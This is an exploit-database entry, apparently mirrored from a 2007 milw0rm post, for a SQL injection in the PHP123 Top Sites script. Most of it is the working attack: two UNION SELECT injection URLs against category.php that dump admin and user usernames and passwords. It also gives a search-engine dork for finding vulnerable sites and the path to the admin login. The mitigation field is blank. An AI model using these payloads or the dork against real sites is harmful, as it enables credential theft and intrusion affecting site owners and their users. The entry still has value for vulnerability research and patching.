header-logo
Suggest Exploit
vendor:
PHP123 Top Sites
by:
t0pP8uZz & xprog
N/A
CVSS
N/A
SQL Injection
CWE
Product Name: PHP123 Top Sites
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

PHP123 Top Sites SQL Injection Vulnerbility

This vulnerability allows an attacker to pull out admin/users login credentials by exploiting a SQL injection vulnerability in the PHP123 Top Sites website. The attacker can use the following URLs to execute the exploit:- http://server.com/category.php?cat=-1/**/UNION/**/ALL/**/SELECT/**/1,concat(username,0x3a,password),3,4,5/**/FROM/**/admin/*- http://server.com/category.php?cat=-1/**/UNION/**/ALL/**/SELECT/**/1,concat(username,0x3a,password),3,4,5/**/FROM/**/users/*Note: The admin login can be found at /siteadmin/ and using the allintext: operator in the search query may return different results.

Mitigation:

Source

Exploit-DB raw data:

--==+================================================================================+==--
--==+		    PHP123 Top Sites SQL Injection Vulnerbility 	             +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog
SITE: N/A
DORK: allintext:"Browse our directory of our members top sites or create your own for free!"


DESCRIPTION: 
pull out admin/users login credentials


EXPLOITS:
http://server.com/category.php?cat=-1/**/UNION/**/ALL/**/SELECT/**/1,concat(username,0x3a,password),3,4,5/**/FROM/**/admin/*
http://server.com/category.php?cat=-1/**/UNION/**/ALL/**/SELECT/**/1,concat(username,0x3a,password),3,4,5/**/FROM/**/users/*


NOTE/TIP: 
admin login is at /siteadmin/
altavista also returns a few diffrent results, dnt use the allintext: thou.


GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.org !


--==+================================================================================+==--
--==+		    PHP123 Top Sites SQL Injection Vulnerbility 	             +==--
--==+================================================================================+==--

# milw0rm.com [2007-07-28]